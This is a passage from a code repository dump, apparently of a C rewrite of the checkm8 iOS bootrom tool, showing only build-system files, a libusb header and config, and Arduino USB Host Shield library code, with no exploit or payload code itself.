LIBUSB_HOTPLUG_EVENT_DEVICE_ARRIVED, 30 | 31 | /* This callback is interested in device removals */ 32 | USBI_HOTPLUG_DEVICE_LEFT = LIBUSB_HOTPLUG_EVENT_DEVICE_LEFT, 33 | 34 | /* IMPORTANT: The values for the below entries must start *after* 35 | * the highest value of the above entries!!! 36 | */ 37 | 38 | /* The vendor_id field is valid for matching */ 39 | USBI_HOTPLUG_VENDOR_ID_VALID = (1U << 3), 40 | 41 | /* The product_id field is valid for matching */ 42 | USBI_HOTPLUG_PRODUCT_ID_VALID = (1U << 4), 43 | 44 | /* The dev_class field is valid for matching */ 45 | USBI_HOTPLUG_DEV_CLASS_VALID = (1U << 5), 46 | 47 | /* This callback has been unregistered and needs to be freed */ 48 | USBI_HOTPLUG_NEEDS_FREE = (1U << 6), 49 | }; 50 | 51 | /** \ingroup hotplug 52 | * The hotplug callback structure. The user populates this structure with 53 | * libusb_hotplug_prepare_callback() and then calls libusb_hotplug_register_callback() 54 | * to receive notification of hotplug events. 55 | */ 56 | struct libusb_hotplug_callback { 57 | /** Flags that control how this callback behaves */ 58 | uint8_t flags; 59 | 60 | /** Vendor ID to match (if flags says this is valid) */ 61 | uint16_t vendor_id; 62 | 63 | /** Product ID to match (if flags says this is valid) */ 64 | uint16_t product_id; 65 | 66 | /** Device class to match (if flags says this is valid) */ 67 | uint8_t dev_class; 68 | 69 | /** Callback function to invoke for matching event/device */ 70 | libusb_hotplug_callback_fn cb; 71 | 72 | /** Handle for this callback (used to match on deregister) */ 73 | libusb_hotplug_callback_handle handle; 74 | 75 | /** User data that will be passed to the callback function */ 76 | void *user_data; 77 | 78 | /** List this callback is registered in (ctx->hotplug_cbs) */ 79 | struct list_head list; 80 | }; 81 | 82 | struct libusb_hotplug_message { 83 | /** The hotplug event that occurred */ 84 | libusb_hotplug_event event; 85 | 86 | /** The device for which this hotplug event occurred */ 87 | struct libusb_device *device; 88 | 89 | /** List this message is contained in (ctx->hotplug_msgs) */ 90 | struct list_head list; 91 | }; 92 | 93 | void usbi_hotplug_deregister(struct libusb_context *ctx, int forced); 94 | void usbi_hotplug_match(struct libusb_context *ctx, struct libusb_device *dev, 95 | libusb_hotplug_event event); 96 | void usbi_hotplug_notification(struct libusb_context *ctx, struct libusb_device *dev, 97 | libusb_hotplug_event event); 98 | 99 | #endif 100 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/C.includecache: -------------------------------------------------------------------------------- 1 | #IncludeRegexLine: ^[ ]*[#%][ ]*(include|import)[ ]*[<"]([^">]+)([">]) 2 | 3 | #IncludeRegexScan: ^.*$ 4 | 5 | #IncludeRegexComplain: ^$ 6 | 7 | #IncludeRegexTransform: 8 | 9 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/main.c 10 | checkm8.h 11 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/checkm8.h 12 | payload.h 13 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/payload.h 14 | stdio.h 15 | - 16 | stdarg.h 17 | - 18 | execinfo.h 19 | - 20 | libusb_helpers.h 21 | - 22 | command.h 23 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/command.h 24 | 25 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/command.c 26 | command.h 27 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/command.h 28 | checkm8.h 29 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/checkm8.h 30 | libusb_helpers.h 31 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb_helpers.h 32 | libusb.h 33 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb.h 34 | stdlib.h 35 | - 36 | string.h 37 | - 38 | 39 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/exploit.c 40 | checkm8.h 41 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/checkm8.h 42 | stdio.h 43 | - 44 | string.h 45 | - 46 | unistd.h 47 | - 48 | stdlib.h 49 | - 50 | libusb_helpers.h 51 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb_helpers.h 52 | libusb.h 53 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb.h 54 | 55 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb_helpers.c 56 | libusb_helpers.h 57 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb_helpers.h 58 | checkm8.h 59 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/checkm8.h 60 | string.h 61 | - 62 | stdio.h 63 | - 64 | stdlib.h 65 | - 66 | libusbi.h 67 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusbi.h 68 | 69 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/payload.c 70 | payload.h 71 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/payload.h 72 | stdio.h 73 | - 74 | stdlib.h 75 | - 76 | stdarg.h 77 | - 78 | command.h 79 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/command.h 80 | libusb_helpers.h 81 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb_helpers.h 82 | 83 | checkm8_libusb/src/libusbi.h 84 | libusb_config.h 85 | checkm8_libusb/src/libusb_config.h 86 | stdlib.h 87 | - 88 | assert.h 89 | - 90 | stddef.h 91 | - 92 | stdint.h 93 | - 94 | time.h 95 | - 96 | stdarg.h 97 | - 98 | poll.h 99 | - 100 | missing.h 101 | - 102 | libusb.h 103 | checkm8_libusb/src/libusb.h 104 | version.h 105 | checkm8_libusb/src/version.h 106 | os/threads_posix.h 107 | checkm8_libusb/src/os/threads_posix.h 108 | os/threads_windows.h 109 | checkm8_libusb/src/os/threads_windows.h 110 | unistd.h 111 | - 112 | os/poll_posix.h 113 | checkm8_libusb/src/os/poll_posix.h 114 | os/poll_windows.h 115 | checkm8_libusb/src/os/poll_windows.h 116 | 117 | checkm8_libusb/src/os/poll_posix.h 118 | 119 | checkm8_libusb/src/os/threads_posix.h 120 | pthread.h 121 | - 122 | sys/time.h 123 | - 124 | 125 | checkm8_libusb/src/version.h 126 | version_nano.h 127 | checkm8_libusb/src/version_nano.h 128 | 129 | checkm8_libusb/src/version_nano.h 130 | 131 | checkm8_remote/include/checkm8.h 132 | checkm8_config.h 133 | checkm8_remote/include/checkm8_config.h 134 | 135 | checkm8_remote/include/command.h 136 | checkm8.h 137 | checkm8_remote/include/checkm8.h 138 | 139 | checkm8_remote/include/libusb_helpers.h 140 | checkm8.h 141 | checkm8_remote/include/checkm8.h 142 | 143 | checkm8_remote/include/payload.h 144 | checkm8.h 145 | checkm8_remote/include/checkm8.h 146 | 147 | include/checkm8_config.h 148 | 149 | include/libusb.h 150 | stdint.h 151 | - 152 | sys/types.h 153 | - 154 | sys/time.h 155 | - 156 | time.h 157 | - 158 | limits.h 159 | - 160 | windows.h 161 | - 162 | winsock.h 163 | - 164 | 165 | include/libusb_config.h 166 | checkm8_config.h 167 | include/checkm8_config.h 168 | 169 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/message.cpp: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | 25 | #include "../../include/Usb.h" 26 | // 0x80 is the default (i.e. trace) to turn off set this global to something lower. 27 | // this allows for 126 other debugging levels. 28 | // TO-DO: Allow assignment to a different serial port by software 29 | int UsbDEBUGlvl = 0x80; 30 | 31 | void E_Notifyc(char c, int lvl) { 32 | if(UsbDEBUGlvl < lvl) return; 33 | #if defined(ARDUINO) && ARDUINO >=100 34 | USB_HOST_SERIAL.print(c); 35 | #else 36 | USB_HOST_SERIAL.print(c, BYTE); 37 | #endif 38 | //USB_HOST_SERIAL.flush(); 39 | } 40 | 41 | void E_Notify(char const * msg, int lvl) { 42 | if(UsbDEBUGlvl < lvl) return; 43 | if(!msg) return; 44 | char c; 45 | 46 | while((c = pgm_read_byte(msg++))) E_Notifyc(c, lvl); 47 | } 48 | 49 | void E_NotifyStr(char const * msg, int lvl) { 50 | if(UsbDEBUGlvl < lvl) return; 51 | if(!msg) return; 52 | char c; 53 | 54 | while((c = *msg++)) E_Notifyc(c, lvl); 55 | } 56 | 57 | void E_Notify(uint8_t b, int lvl) { 58 | if(UsbDEBUGlvl < lvl) return; 59 | #if defined(ARDUINO) && ARDUINO >=100 60 | USB_HOST_SERIAL.print(b); 61 | #else 62 | USB_HOST_SERIAL.print(b, DEC); 63 | #endif 64 | //USB_HOST_SERIAL.flush(); 65 | } 66 | 67 | void E_Notify(double d, int lvl) { 68 | if(UsbDEBUGlvl < lvl) return; 69 | USB_HOST_SERIAL.print(d); 70 | //USB_HOST_SERIAL.flush(); 71 | } 72 | 73 | #ifdef DEBUG_USB_HOST 74 | 75 | void NotifyFailGetDevDescr(void) { 76 | Notify(PSTR("\r\ngetDevDescr "), 0x80); 77 | } 78 | 79 | void NotifyFailSetDevTblEntry(void) { 80 | Notify(PSTR("\r\nsetDevTblEn "), 0x80); 81 | } 82 | 83 | void NotifyFailGetConfDescr(void) { 84 | Notify(PSTR("\r\ngetConf "), 0x80); 85 | } 86 | 87 | void NotifyFailSetConfDescr(void) { 88 | Notify(PSTR("\r\nsetConf "), 0x80); 89 | } 90 | 91 | void NotifyFailGetDevDescr(uint8_t reason) { 92 | NotifyFailGetDevDescr(); 93 | NotifyFail(reason); 94 | } 95 | 96 | void NotifyFailSetDevTblEntry(uint8_t reason) { 97 | NotifyFailSetDevTblEntry(); 98 | NotifyFail(reason); 99 | 100 | } 101 | 102 | void NotifyFailGetConfDescr(uint8_t reason) { 103 | NotifyFailGetConfDescr(); 104 | NotifyFail(reason); 105 | } 106 | 107 | void NotifyFailSetConfDescr(uint8_t reason) { 108 | NotifyFailSetConfDescr(); 109 | NotifyFail(reason); 110 | } 111 | 112 | void NotifyFailUnknownDevice(uint16_t VID, uint16_t PID) { 113 | Notify(PSTR("\r\nUnknown Device Connected - VID: "), 0x80); 114 | D_PrintHex (VID, 0x80); 115 | Notify(PSTR(" PID: "), 0x80); 116 | D_PrintHex (PID, 0x80); 117 | } 118 | 119 | void NotifyFail(uint8_t rcode) { 120 | D_PrintHex (rcode, 0x80); 121 | Notify(PSTR("\r\n"), 0x80); 122 | } 123 | #endif 124 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/macros.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | 25 | #if !defined(_usb_h_) || defined(MACROS_H) 26 | #error "Never include macros.h directly; include Usb.h instead" 27 | #else 28 | #define MACROS_H 29 | 30 | //////////////////////////////////////////////////////////////////////////////// 31 | // HANDY MACROS 32 | //////////////////////////////////////////////////////////////////////////////// 33 | 34 | #define VALUE_BETWEEN(v,l,h) (((v)>(l)) && ((v)<(h))) 35 | #define VALUE_WITHIN(v,l,h) (((v)>=(l)) && ((v)<=(h))) 36 | #define output_pgm_message(wa,fp,mp,el) wa = &mp, fp((char *)pgm_read_pointer(wa), el) 37 | #define output_if_between(v,l,h,wa,fp,mp,el) if(VALUE_BETWEEN(v,l,h)) output_pgm_message(wa,fp,mp[v-(l+1)],el); 38 | 39 | #define SWAP(a, b) (((a) ^= (b)), ((b) ^= (a)), ((a) ^= (b))) 40 | #ifndef __BYTE_GRABBING_DEFINED__ 41 | #define __BYTE_GRABBING_DEFINED__ 1 42 | #ifdef BROKEN_OPTIMIZER_LITTLE_ENDIAN 43 | // Note: Use this if your compiler generates horrible assembler! 44 | #define BGRAB0(__usi__) (((uint8_t *)&(__usi__))[0]) 45 | #define BGRAB1(__usi__) (((uint8_t *)&(__usi__))[1]) 46 | #define BGRAB2(__usi__) (((uint8_t *)&(__usi__))[2]) 47 | #define BGRAB3(__usi__) (((uint8_t *)&(__usi__))[3]) 48 | #define BGRAB4(__usi__) (((uint8_t *)&(__usi__))[4]) 49 | #define BGRAB5(__usi__) (((uint8_t *)&(__usi__))[5]) 50 | #define BGRAB6(__usi__) (((uint8_t *)&(__usi__))[6]) 51 | #define BGRAB7(__usi__) (((uint8_t *)&(__usi__))[7]) 52 | #else 53 | // Note: The cast alone to uint8_t is actually enough. 54 | // GCC throws out the "& 0xff", and the size is no different. 55 | // Some compilers need it. 56 | #define BGRAB0(__usi__) ((uint8_t)((__usi__) & 0xff )) 57 | #define BGRAB1(__usi__) ((uint8_t)(((__usi__) >> 8) & 0xff)) 58 | #define BGRAB2(__usi__) ((uint8_t)(((__usi__) >> 16) & 0xff)) 59 | #define BGRAB3(__usi__) ((uint8_t)(((__usi__) >> 24) & 0xff)) 60 | #define BGRAB4(__usi__) ((uint8_t)(((__usi__) >> 32) & 0xff)) 61 | #define BGRAB5(__usi__) ((uint8_t)(((__usi__) >> 40) & 0xff)) 62 | #define BGRAB6(__usi__) ((uint8_t)(((__usi__) >> 48) & 0xff)) 63 | #define BGRAB7(__usi__) ((uint8_t)(((__usi__) >> 56) & 0xff)) 64 | #endif 65 | #define BOVER1(__usi__) ((uint16_t)(__usi__) << 8) 66 | #define BOVER2(__usi__) ((uint32_t)(__usi__) << 16) 67 | #define BOVER3(__usi__) ((uint32_t)(__usi__) << 24) 68 | #define BOVER4(__usi__) ((uint64_t)(__usi__) << 32) 69 | #define BOVER5(__usi__) ((uint64_t)(__usi__) << 40) 70 | #define BOVER6(__usi__) ((uint64_t)(__usi__) << 48) 71 | #define BOVER7(__usi__) ((uint64_t)(__usi__) << 56) 72 | 73 | // These are the smallest and fastest ways I have found so far in pure C/C++. 74 | #define BMAKE16(__usc1__,__usc0__) ((uint16_t)((uint16_t)(__usc0__) | (uint16_t)BOVER1(__usc1__))) 75 | #define BMAKE32(__usc3__,__usc2__,__usc1__,__usc0__) ((uint32_t)((uint32_t)(__usc0__) | (uint32_t)BOVER1(__usc1__) | (uint32_t)BOVER2(__usc2__) | (uint32_t)BOVER3(__usc3__))) 76 | #define BMAKE64(__usc7__,__usc6__,__usc5__,__usc4__,__usc3__,__usc2__,__usc1__,__usc0__) ((uint64_t)((uint64_t)__usc0__ | (uint64_t)BOVER1(__usc1__) | (uint64_t)BOVER2(__usc2__) | (uint64_t)BOVER3(__usc3__) | (uint64_t)BOVER4(__usc4__) | (uint64_t)BOVER5(__usc5__) | (uint64_t)BOVER6(__usc6__) | (uint64_t)BOVER1(__usc7__))) 77 | #endif 78 | 79 | /* 80 | * Debug macros: Strings are stored in progmem (flash) instead of RAM. 81 | */ 82 | #define USBTRACE(s) (Notify(PSTR(s), 0x80)) 83 | #define USBTRACE1(s,l) (Notify(PSTR(s), l)) 84 | #define USBTRACE2(s,r) (Notify(PSTR(s), 0x80), D_PrintHex((r), 0x80), Notify(PSTR("\r\n"), 0x80)) 85 | #define USBTRACE3(s,r,l) (Notify(PSTR(s), l), D_PrintHex((r), l), Notify(PSTR("\r\n"), l)) 86 | 87 | 88 | #endif /* MACROS_H */ 89 | 90 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/parsetools.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | 25 | #if !defined(_usb_h_) || defined(__PARSETOOLS_H__) 26 | #error "Never include parsetools.h directly; include Usb.h instead" 27 | #else 28 | #define __PARSETOOLS_H__ 29 | 30 | struct MultiValueBuffer { 31 | uint8_t valueSize; 32 | void *pValue; 33 | 34 | public: 35 | 36 | MultiValueBuffer() : valueSize(0), pValue(NULL) { 37 | }; 38 | } __attribute__((packed)); 39 | 40 | class MultiByteValueParser { 41 | uint8_t * pBuf; 42 | uint8_t countDown; 43 | uint8_t valueSize; 44 | 45 | public: 46 | 47 | MultiByteValueParser() : pBuf(NULL), countDown(0), valueSize(0) { 48 | }; 49 | 50 | const uint8_t* GetBuffer() { 51 | return pBuf; 52 | }; 53 | 54 | void Initialize(MultiValueBuffer * const pbuf) { 55 | pBuf = (uint8_t*)pbuf->pValue; 56 | countDown = valueSize = pbuf->valueSize; 57 | }; 58 | 59 | bool Parse(uint8_t **pp, uint16_t *pcntdn); 60 | }; 61 | 62 | class ByteSkipper { 63 | uint8_t *pBuf; 64 | uint8_t nStage; 65 | uint16_t countDown; 66 | 67 | public: 68 | 69 | ByteSkipper() : pBuf(NULL), nStage(0), countDown(0) { 70 | }; 71 | 72 | void Initialize(MultiValueBuffer *pbuf) { 73 | pBuf = (uint8_t*)pbuf->pValue; 74 | countDown = 0; 75 | }; 76 | 77 | bool Skip(uint8_t **pp, uint16_t *pcntdn, uint16_t bytes_to_skip) { 78 | switch(nStage) { 79 | case 0: 80 | countDown = bytes_to_skip; 81 | nStage++; 82 | case 1: 83 | for(; countDown && (*pcntdn); countDown--, (*pp)++, (*pcntdn)--); 84 | 85 | if(!countDown) 86 | nStage = 0; 87 | }; 88 | return (!countDown); 89 | }; 90 | }; 91 | 92 | // Pointer to a callback function triggered for each element of PTP array when used with PTPArrayParser 93 | typedef void (*PTP_ARRAY_EL_FUNC)(const MultiValueBuffer * const p, uint32_t count, const void *me); 94 | 95 | class PTPListParser { 96 | public: 97 | 98 | enum ParseMode { 99 | modeArray, modeRange/*, modeEnum*/ 100 | }; 101 | 102 | private: 103 | uint8_t nStage; 104 | uint8_t enStage; 105 | 106 | uint32_t arLen; 107 | uint32_t arLenCntdn; 108 | 109 | uint8_t lenSize; // size of the array length field in bytes 110 | uint8_t valSize; // size of the array element in bytes 111 | 112 | MultiValueBuffer *pBuf; 113 | 114 | // The only parser for both size and array element parsing 115 | MultiByteValueParser theParser; 116 | 117 | uint8_t /*ParseMode*/ prsMode; 118 | 119 | public: 120 | 121 | PTPListParser() : 122 | nStage(0), 123 | enStage(0), 124 | arLen(0), 125 | arLenCntdn(0), 126 | lenSize(0), 127 | valSize(0), 128 | pBuf(NULL), 129 | prsMode(modeArray) { 130 | }; 131 | 132 | void Initialize(const uint8_t len_size, const uint8_t val_size, MultiValueBuffer * const p, const uint8_t mode = modeArray) { 133 | pBuf = p; 134 | lenSize = len_size; 135 | valSize = val_size; 136 | prsMode = mode; 137 | 138 | if(prsMode == modeRange) { 139 | arLenCntdn = arLen = 3; 140 | nStage = 2; 141 | } else { 142 | arLenCntdn = arLen = 0; 143 | nStage = 0; 144 | } 145 | enStage = 0; 146 | theParser.Initialize(p); 147 | }; 148 | 149 | bool Parse(uint8_t **pp, uint16_t *pcntdn, PTP_ARRAY_EL_FUNC pf, const void *me = NULL); 150 | }; 151 | 152 | #endif // __PARSETOOLS_H__ 153 | -------------------------------------------------------------------------------- /CMakeFiles/3.10.2/CMakeCXXCompiler.cmake: -------------------------------------------------------------------------------- 1 | set(CMAKE_CXX_COMPILER "/usr/bin/c++") 2 | set(CMAKE_CXX_COMPILER_ARG1 "") 3 | set(CMAKE_CXX_COMPILER_ID "GNU") 4 | set(CMAKE_CXX_COMPILER_VERSION "7.4.0") 5 | set(CMAKE_CXX_COMPILER_VERSION_INTERNAL "") 6 | set(CMAKE_CXX_COMPILER_WRAPPER "") 7 | set(CMAKE_CXX_STANDARD_COMPUTED_DEFAULT "14") 8 | set(CMAKE_CXX_COMPILE_FEATURES "cxx_std_98;cxx_template_template_parameters;cxx_std_11;cxx_alias_templates;cxx_alignas;cxx_alignof;cxx_attributes;cxx_auto_type;cxx_constexpr;cxx_decltype;cxx_decltype_incomplete_return_types;cxx_default_function_template_args;cxx_defaulted_functions;cxx_defaulted_move_initializers;cxx_delegating_constructors;cxx_deleted_functions;cxx_enum_forward_declarations;cxx_explicit_conversions;cxx_extended_friend_declarations;cxx_extern_templates;cxx_final;cxx_func_identifier;cxx_generalized_initializers;cxx_inheriting_constructors;cxx_inline_namespaces;cxx_lambdas;cxx_local_type_template_args;cxx_long_long_type;cxx_noexcept;cxx_nonstatic_member_init;cxx_nullptr;cxx_override;cxx_range_for;cxx_raw_string_literals;cxx_reference_qualified_functions;cxx_right_angle_brackets;cxx_rvalue_references;cxx_sizeof_member;cxx_static_assert;cxx_strong_enums;cxx_thread_local;cxx_trailing_return_types;cxx_unicode_literals;cxx_uniform_initialization;cxx_unrestricted_unions;cxx_user_literals;cxx_variadic_macros;cxx_variadic_templates;cxx_std_14;cxx_aggregate_default_initializers;cxx_attribute_deprecated;cxx_binary_literals;cxx_contextual_conversions;cxx_decltype_auto;cxx_digit_separators;cxx_generic_lambdas;cxx_lambda_init_captures;cxx_relaxed_constexpr;cxx_return_type_deduction;cxx_variable_templates;cxx_std_17") 9 | set(CMAKE_CXX98_COMPILE_FEATURES "cxx_std_98;cxx_template_template_parameters") 10 | set(CMAKE_CXX11_COMPILE_FEATURES "cxx_std_11;cxx_alias_templates;cxx_alignas;cxx_alignof;cxx_attributes;cxx_auto_type;cxx_constexpr;cxx_decltype;cxx_decltype_incomplete_return_types;cxx_default_function_template_args;cxx_defaulted_functions;cxx_defaulted_move_initializers;cxx_delegating_constructors;cxx_deleted_functions;cxx_enum_forward_declarations;cxx_explicit_conversions;cxx_extended_friend_declarations;cxx_extern_templates;cxx_final;cxx_func_identifier;cxx_generalized_initializers;cxx_inheriting_constructors;cxx_inline_namespaces;cxx_lambdas;cxx_local_type_template_args;cxx_long_long_type;cxx_noexcept;cxx_nonstatic_member_init;cxx_nullptr;cxx_override;cxx_range_for;cxx_raw_string_literals;cxx_reference_qualified_functions;cxx_right_angle_brackets;cxx_rvalue_references;cxx_sizeof_member;cxx_static_assert;cxx_strong_enums;cxx_thread_local;cxx_trailing_return_types;cxx_unicode_literals;cxx_uniform_initialization;cxx_unrestricted_unions;cxx_user_literals;cxx_variadic_macros;cxx_variadic_templates") 11 | set(CMAKE_CXX14_COMPILE_FEATURES "cxx_std_14;cxx_aggregate_default_initializers;cxx_attribute_deprecated;cxx_binary_literals;cxx_contextual_conversions;cxx_decltype_auto;cxx_digit_separators;cxx_generic_lambdas;cxx_lambda_init_captures;cxx_relaxed_constexpr;cxx_return_type_deduction;cxx_variable_templates") 12 | set(CMAKE_CXX17_COMPILE_FEATURES "cxx_std_17") 13 | 14 | set(CMAKE_CXX_PLATFORM_ID "Linux") 15 | set(CMAKE_CXX_SIMULATE_ID "") 16 | set(CMAKE_CXX_SIMULATE_VERSION "") 17 | 18 | 19 | 20 | set(CMAKE_AR "/usr/bin/ar") 21 | set(CMAKE_CXX_COMPILER_AR "/usr/bin/gcc-ar-7") 22 | set(CMAKE_RANLIB "/usr/bin/ranlib") 23 | set(CMAKE_CXX_COMPILER_RANLIB "/usr/bin/gcc-ranlib-7") 24 | set(CMAKE_LINKER "/usr/bin/ld") 25 | set(CMAKE_COMPILER_IS_GNUCXX 1) 26 | set(CMAKE_CXX_COMPILER_LOADED 1) 27 | set(CMAKE_CXX_COMPILER_WORKS TRUE) 28 | set(CMAKE_CXX_ABI_COMPILED TRUE) 29 | set(CMAKE_COMPILER_IS_MINGW ) 30 | set(CMAKE_COMPILER_IS_CYGWIN ) 31 | if(CMAKE_COMPILER_IS_CYGWIN) 32 | set(CYGWIN 1) 33 | set(UNIX 1) 34 | endif() 35 | 36 | set(CMAKE_CXX_COMPILER_ENV_VAR "CXX") 37 | 38 | if(CMAKE_COMPILER_IS_MINGW) 39 | set(MINGW 1) 40 | endif() 41 | set(CMAKE_CXX_COMPILER_ID_RUN 1) 42 | set(CMAKE_CXX_IGNORE_EXTENSIONS inl;h;hpp;HPP;H;o;O;obj;OBJ;def;DEF;rc;RC) 43 | set(CMAKE_CXX_SOURCE_FILE_EXTENSIONS C;M;c++;cc;cpp;cxx;mm;CPP) 44 | set(CMAKE_CXX_LINKER_PREFERENCE 30) 45 | set(CMAKE_CXX_LINKER_PREFERENCE_PROPAGATES 1) 46 | 47 | # Save compiler ABI information. 48 | set(CMAKE_CXX_SIZEOF_DATA_PTR "8") 49 | set(CMAKE_CXX_COMPILER_ABI "ELF") 50 | set(CMAKE_CXX_LIBRARY_ARCHITECTURE "x86_64-linux-gnu") 51 | 52 | if(CMAKE_CXX_SIZEOF_DATA_PTR) 53 | set(CMAKE_SIZEOF_VOID_P "${CMAKE_CXX_SIZEOF_DATA_PTR}") 54 | endif() 55 | 56 | if(CMAKE_CXX_COMPILER_ABI) 57 | set(CMAKE_INTERNAL_PLATFORM_ABI "${CMAKE_CXX_COMPILER_ABI}") 58 | endif() 59 | 60 | if(CMAKE_CXX_LIBRARY_ARCHITECTURE) 61 | set(CMAKE_LIBRARY_ARCHITECTURE "x86_64-linux-gnu") 62 | endif() 63 | 64 | set(CMAKE_CXX_CL_SHOWINCLUDES_PREFIX "") 65 | if(CMAKE_CXX_CL_SHOWINCLUDES_PREFIX) 66 | set(CMAKE_CL_SHOWINCLUDES_PREFIX "${CMAKE_CXX_CL_SHOWINCLUDES_PREFIX}") 67 | endif() 68 | 69 | 70 | 71 | 72 | 73 | set(CMAKE_CXX_IMPLICIT_LINK_LIBRARIES "stdc++;m;gcc_s;gcc;c;gcc_s;gcc") 74 | set(CMAKE_CXX_IMPLICIT_LINK_DIRECTORIES "/usr/lib/gcc/x86_64-linux-gnu/7;/usr/lib/x86_64-linux-gnu;/usr/lib;/lib/x86_64-linux-gnu;/lib") 75 | set(CMAKE_CXX_IMPLICIT_LINK_FRAMEWORK_DIRECTORIES "") 76 | -------------------------------------------------------------------------------- /include/libusb_config.h: -------------------------------------------------------------------------------- 1 | /* config.h. Generated from config.h.in by configure. */ 2 | /* config.h.in. Generated from configure.ac by autoheader. */ 3 | 4 | #include "checkm8_config.h" 5 | 6 | /* Default visibility */ 7 | #define DEFAULT_VISIBILITY __attribute__((visibility("default"))) 8 | 9 | #ifdef LIBUSB_LOGGING 10 | /* Start with debug message logging enabled */ 11 | #define ENABLE_DEBUG_LOGGING 1 12 | 13 | /* Message logging */ 14 | #define ENABLE_LOGGING 1 15 | #endif 16 | 17 | /* Define to 1 if you have the header file. */ 18 | /* #undef HAVE_ASM_TYPES_H */ 19 | 20 | /* Define to 1 if you have the declaration of `TFD_CLOEXEC', and to 0 if you 21 | don't. */ 22 | #define HAVE_DECL_TFD_CLOEXEC 1 23 | 24 | /* Define to 1 if you have the declaration of `TFD_NONBLOCK', and to 0 if you 25 | don't. */ 26 | #define HAVE_DECL_TFD_NONBLOCK 1 27 | 28 | /* Define to 1 if you have the header file. */ 29 | #define HAVE_DLFCN_H 1 30 | 31 | /* Define to 1 if you have the header file. */ 32 | #define HAVE_INTTYPES_H 1 33 | 34 | /* Define to 1 if you have the `udev' library (-ludev). */ 35 | #define HAVE_LIBUDEV 1 36 | 37 | /* Define to 1 if you have the header file. */ 38 | #define HAVE_LIBUDEV_H 1 39 | 40 | /* Define to 1 if you have the header file. */ 41 | /* #undef HAVE_LINUX_NETLINK_H */ 42 | 43 | /* Define to 1 if you have the header file. */ 44 | #define HAVE_MEMORY_H 1 45 | 46 | /* Define to 1 if you have the `pipe2' function. */ 47 | #define HAVE_PIPE2 1 48 | 49 | /* Define to 1 if you have the header file. */ 50 | #define HAVE_POLL_H 1 51 | 52 | /* Define to 1 if you have the header file. */ 53 | #define HAVE_STDINT_H 1 54 | 55 | /* Define to 1 if you have the header file. */ 56 | #define HAVE_STDLIB_H 1 57 | 58 | /* Define to 1 if you have the header file. */ 59 | #define HAVE_STRINGS_H 1 60 | 61 | /* Define to 1 if you have the header file. */ 62 | #define HAVE_STRING_H 1 63 | 64 | /* Define to 1 if the system has the type `struct timespec'. */ 65 | #define HAVE_STRUCT_TIMESPEC 1 66 | 67 | /* syslog() function available */ 68 | /* #undef HAVE_SYSLOG_FUNC */ 69 | 70 | /* Define to 1 if you have the header file. */ 71 | /* #undef HAVE_SYSLOG_H */ 72 | 73 | /* Define 